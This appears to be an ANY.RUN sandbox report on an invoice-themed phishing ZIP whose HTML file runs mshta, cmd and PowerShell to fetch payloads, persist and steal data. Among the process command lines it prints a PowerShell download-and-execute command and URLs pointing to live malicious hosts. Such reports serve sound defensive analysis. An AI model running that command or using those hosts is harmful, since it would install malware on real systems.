File name:

Se adjunta factura Nº - O6v0V8F5D3Y2R2805.zip

Full analysis: https://app.any.run/tasks/1b13e083-3c7b-45d0-affb-66599dd5f9f3
Verdict: Malicious activity
Analysis date: May 10, 2024, 19:51:33
OS: Windows 11 Professional (build: 22000, 64 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

54DA5A3E184E598FD9A330281BDBD47C

SHA1:

D5E8327B838344B5BD752A0ABF9C2BCDE4F57AE0

SHA256:

04F8A053EF21E894A1E5CDC1A0B37C393D0C104F89CB3ED9EE43755B7F03E287

SSDEEP:

48:9y8qkFAvMvmTnquDBd3qhTgapVTtbioErc31y9Sw6P4a8i5:55FAvMeTqgBd3qhTga3Yc31+Sw6SA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Scans artifacts that could help determine the target

      • mshta.exe (PID: 7048)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 536)
    • Modifies registry (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)
    • Drops the executable file immediately after the start

      • powershell.exe (PID: 6756)
    • Create files in the Startup directory

      • powershell.exe (PID: 6756)
    • Bypass User Account Control (DelegateExecute)

      • powershell.exe (PID: 6756)
    • Actions looks like stealing of personal data

      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7940)
  • SUSPICIOUS

    • Reads the Internet Settings

      • OpenWith.exe (PID: 2488)
      • OpenWith.exe (PID: 6740)
      • mshta.exe (PID: 7048)
      • powershell.exe (PID: 6756)
      • PickerHost.exe (PID: 3728)
      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 536)
      • pingsender.exe (PID: 7940)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7864)
    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 1352)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7940)
    • Writes binary data to a Stream object (SCRIPT)

      • mshta.exe (PID: 7048)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • mshta.exe (PID: 7048)
    • Executing commands from ".cmd" file

      • mshta.exe (PID: 7048)
    • Potential Corporate Privacy Violation

      • chrome.exe (PID: 1588)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 7048)
      • cmd.exe (PID: 1544)
      • cmd.exe (PID: 5196)
      • cmd.exe (PID: 5280)
    • Checks whether a specific file exists (SCRIPT)

      • mshta.exe (PID: 7048)
    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 1544)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 5196)
    • Application launched itself

      • cmd.exe (PID: 1544)
      • cmd.exe (PID: 5196)
      • cmd.exe (PID: 5280)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 1544)
      • cmd.exe (PID: 5196)
      • cmd.exe (PID: 5280)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1544)
      • cmd.exe (PID: 5196)
      • cmd.exe (PID: 5280)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 536)
      • powershell.exe (PID: 5464)
    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)
    • Unusual connection from system programs

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 536)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 536)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6756)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6756)
    • The process drops C-runtime libraries

      • powershell.exe (PID: 6756)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 6756)
    • Changes default file association

      • powershell.exe (PID: 6756)
    • The process creates files with name similar to system file names

      • powershell.exe (PID: 6756)
    • The system shut down or reboot

      • powershell.exe (PID: 6756)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 7048)
    • Executes application which crashes

      • _tnuwpr9_Ni7.exe (PID: 1064)
    • Loads DLL from Mozilla Firefox

      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7940)
      • pingsender.exe (PID: 7876)
    • Reads settings of System Certificates

      • pingsender.exe (PID: 7940)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7876)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 536)
    • Checks Windows Trust Settings

      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7940)
      • pingsender.exe (PID: 7864)
  • INFO

    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 2488)
      • WinRAR.exe (PID: 6080)
      • chrome.exe (PID: 6056)
      • OpenWith.exe (PID: 6740)
      • WinRAR.exe (PID: 1352)
      • firefox.exe (PID: 6348)
    • Reads security settings of Internet Explorer

      • OpenWith.exe (PID: 2488)
      • OpenWith.exe (PID: 6740)
      • PickerHost.exe (PID: 3728)
    • The process uses the downloaded file

      • chrome.exe (PID: 6928)
      • chrome.exe (PID: 7156)
      • chrome.exe (PID: 6548)
      • chrome.exe (PID: 6656)
      • chrome.exe (PID: 7004)
      • OpenWith.exe (PID: 6740)
      • chrome.exe (PID: 6004)
      • chrome.exe (PID: 7064)
      • WinRAR.exe (PID: 1352)
      • chrome.exe (PID: 7124)
      • chrome.exe (PID: 6488)
      • chrome.exe (PID: 6576)
    • Application launched itself

      • chrome.exe (PID: 6056)
      • firefox.exe (PID: 6324)
      • firefox.exe (PID: 6348)
    • Checks proxy server information

      • mshta.exe (PID: 7048)
      • powershell.exe (PID: 6756)
      • WerFault.exe (PID: 988)
      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 536)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7940)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 7048)
    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 6756)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 536)
      • powershell.exe (PID: 5464)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 5464)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6756)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6756)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 6756)
      • powershell.exe (PID: 536)
      • powershell.exe (PID: 5464)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 6756)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6756)
    • Manual execution by a user

      • cmd.exe (PID: 5196)
      • _tnuwpr9_Ni7.exe (PID: 1064)
      • cmd.exe (PID: 5280)
      • firefox.exe (PID: 6324)
    • Checks supported languages

      • _tnuwpr9_Ni7.exe (PID: 1064)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7940)
    • Reads Environment values

      • _tnuwpr9_Ni7.exe (PID: 1064)
    • Reads the Internet Settings

      • WerFault.exe (PID: 988)
    • Reads the software policy settings

      • WerFault.exe (PID: 988)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7940)
    • Creates files or folders in the user directory

      • WerFault.exe (PID: 988)
      • pingsender.exe (PID: 7864)
    • Reads the machine GUID from the registry

      • pingsender.exe (PID: 7940)
      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7864)
    • Reads the computer name

      • pingsender.exe (PID: 7876)
      • pingsender.exe (PID: 7864)
      • pingsender.exe (PID: 7940)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0800
ZipCompression: Deflated
ZipModifyDate: 2024:05:10 12:40:46
ZipCRC: 0x69c710d7
ZipCompressedSize: 1388
ZipUncompressedSize: 6774
ZipFileName: Se adjunta factura Nº - O6v0V8F5D3Y2R2805.html
No data.
All screenshots are available in the full report
Total processes
300
Monitored processes
85
Malicious processes
14
Suspicious processes
0

Behavior graph

The behavior graph is interactive and only available in the full report. Process nodes it shows that are not marked "no specs": chrome.exe (2 instances), mshta.exe, powershell.exe (3 instances), _tnuwpr9_ni7.exe, werfault.exe, firefox.exe (1 instance), pingsender.exe (3 instances). Remaining nodes, all marked "no specs": winrar.exe, openwith.exe, chrome.exe, cmd.exe, conhost.exe, shutdown.exe, pickerhost.exe, firefox.exe.

Process information

PID
CMD
Path
Indicators
Parent process
PID: 536
CMD: powershell.exe -nop -win 1 -
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 748
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6596 -childID 12 -isForBrowser -prefsHandle 6700 -prefMapHandle 6704 -prefsLen 28202 -prefMapSize 242999 -jsInitHandle 1344 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4f9316a-a299-4436-b5c1-ba42ba3441e8} 6348 "\\.\pipe\gecko-crash-server-pipe.6348" 21d76bbb150 tab
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\vcruntime140_1.dll
PID: 948
CMD: C:\Windows\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('http://tyahw.3utilities.com/ldvb/pw') "
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
PID: 988
CMD: C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 700
Path: C:\Windows\SysWOW64\WerFault.exe
Parent process: _tnuwpr9_Ni7.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.22000.653 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
PID: 1064
CMD: "C:\_tnuwpr9_N\_tnuwpr9_Ni7.exe"
Path: C:\_tnuwpr9_N\_tnuwpr9_Ni7.exe
Parent process: explorer.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Exit code:
3221225477
Version:
8.0.920.14
Modules
Images
c:\_tnuwpr9_n\_tnuwpr9_ni7.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
PID: 1076
CMD: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6924 -childID 13 -isForBrowser -prefsHandle 6784 -prefMapHandle 5616 -prefsLen 28202 -prefMapSize 242999 -jsInitHandle 1344 -jsInitLen 235124 -parentBuildID 20240213221259 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6aa0bfb2-feca-4b58-816e-86d1d160e005} 6348 "\\.\pipe\gecko-crash-server-pipe.6348" 21d76bbb310 tab
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Parent process: firefox.exe
User:
admin
Company:
Mozilla Corporation
Integrity Level:
LOW
Description:
Firefox
Exit code:
0
Version:
123.0
Modules
Images
c:\program files\mozilla firefox\firefox.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\program files\mozilla firefox\mozglue.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msvcp140.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\vcruntime140_1.dll
PID: 1352
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\Factura-ZRAKG.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: OpenWith.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
1073807364
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 1420
CMD: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,11249738196056524982,8773611683334439535,262144 --variations-seed-version --mojo-platform-channel-handle=3180 /prefetch:1
Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
123.0.6312.86
Modules
Images
c:\program files (x86)\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\google\chrome\application\123.0.6312.86\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
PID: 1544
CMD: "C:\Windows\System32\cmd.exe" /c C:\Users\Public\e.cmd
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64base.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64con.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
PID: 1588
CMD: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --no-appcompat-clear --field-trial-handle=2100,i,11249738196056524982,8773611683334439535,262144 --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3
Path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
123.0.6312.86
Modules
Images
c:\program files (x86)\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\google\chrome\application\123.0.6312.86\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
Total events
106 549
Read events
106 240
Write events
304
Delete events
5

Modification events

(PID) Process: (6080) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\General
Operation: write
Name: VerInfo
Value:
005B0500FA5ED87E13A3DA01

(PID) Process: (6080) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtBMP
Value:

(PID) Process: (6080) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation: write
Name: ShellExtIcon
Value:

(PID) Process: (6080) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value:
C:\Users\admin\Downloads\Se adjunta factura Nº - O6v0V8F5D3Y2R2805.zip

(PID) Process: (6080) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value:
120

(PID) Process: (6080) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value:
80

(PID) Process: (6080) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value:
120

(PID) Process: (6080) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value:
100

(PID) Process: (6080) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithProgids
Operation: write
Name: MSEdgeHTM
Value:

(PID) Process: (2488) OpenWith.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithProgids
Operation: write
Name: MSEdgeHTM
Value:
Executable files
7
Suspicious files
365
Text files
100
Unknown types
33

Dropped files

PID
Process
Filename
Type
PID 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-663E7AE6-17A8.pma
MD5:
SHA256:
PID 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Local State
MD5:
SHA256:
PID 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
PID 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
PID 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF10e83f.TMP
MD5:
SHA256:
PID 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
PID 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old
MD5:
SHA256:
PID 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.old~RF10e83f.TMP
MD5:
SHA256:
PID 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\LOG.old
MD5:
SHA256:
PID 6056 | chrome.exe | C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
50
TCP/UDP connections
119
DNS requests
80
Threats
19

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1088 | svchost.exe | POST | 302 | 184.28.89.167:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | unknown
2868 | OfficeClickToRun.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D | unknown | unknown
1088 | svchost.exe | POST | 302 | 184.28.89.167:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | unknown
1088 | svchost.exe | POST | 302 | 184.28.89.167:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | unknown
1088 | svchost.exe | POST | 302 | 184.28.89.167:80 | http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409 | unknown | unknown
1588 | chrome.exe | GET | 200 | 34.104.35.123:80 | http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUwyMERESEZGVmJnQQ/1.0.0.6_nmmhkkegccagdldgiimedpiccmgmieda.crx | unknown | unknown
7048 | mshta.exe | GET | 200 | 93.127.215.82:80 | http://tyahw.3utilities.com/ldvb/0105 | unknown | unknown
6756 | powershell.exe | GET | 200 | 93.127.215.82:80 | http://tyahw.3utilities.com/ldvb/pw | unknown | unknown
6756 | powershell.exe | GET | 200 | 51.20.73.61:80 | http://51.20.73.61/m5.zip | unknown | unknown
2828 | svchost.exe | GET | 200 | 199.232.214.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?4d03a57f1cd14d0c | unknown | unknown

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
239.255.255.250:1900 | unknown
2844 | svchost.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:137 | whitelisted
2844 | svchost.exe | 20.42.73.31:443 | v10.events.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown
1088 | svchost.exe | 184.28.89.167:80 | go.microsoft.com | AKAMAI-AS | US | unknown
2868 | OfficeClickToRun.exe | 20.42.72.131:443 | self.events.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown
2868 | OfficeClickToRun.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
66.102.1.84:443 | accounts.google.com | GOOGLE | US | unknown
216.58.206.35:443 | clientservices.googleapis.com | GOOGLE | US | unknown
142.250.181.238:443 | clients2.google.com | GOOGLE | US | unknown

DNS requests

Domain
IP
Reputation
v10.events.data.microsoft.com
  • 20.42.73.31
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
self.events.data.microsoft.com
  • 20.42.72.131
  • 52.182.143.209
whitelisted
clientservices.googleapis.com
  • 216.58.206.35
whitelisted
accounts.google.com
  • 66.102.1.84
shared
clients2.google.com
  • 142.250.181.238
whitelisted
firebasestorage.googleapis.com
  • 216.58.206.74
  • 216.58.206.42
  • 172.217.18.10
  • 142.250.185.106
  • 142.250.186.170
  • 142.250.185.170
  • 142.250.186.106
  • 142.250.185.74
  • 142.250.74.202
  • 142.250.184.234
  • 142.250.185.202
  • 142.250.184.202
  • 142.250.185.234
  • 142.250.186.138
  • 172.217.16.202
  • 142.250.185.138
whitelisted
edgedl.me.gvt1.com
  • 34.104.35.123
whitelisted
www.google.com
  • 142.250.186.100
whitelisted
zacmn.tech
  • 38.54.45.29
unknown

Threats

PID
Process
Class
Message
Misc activity | ET INFO Microsoft Connection Test
1588 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage
1588 | chrome.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage
1588 | chrome.exe | Potential Corporate Privacy Violation | ET POLICY Dropbox.com Offsite File Backup in Use
Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.3utilities .com
7048 | mshta.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.3utilities .com Domain
7048 | mshta.exe | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell
6756 | powershell.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS HTTP Request to a *.3utilities .com Domain
6756 | powershell.exe | Potentially Bad Traffic | ET HUNTING Terse Request for Zip File (GET)
6756 | powershell.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host ZIP Request
5 ETPRO signatures available at the full report
No debug info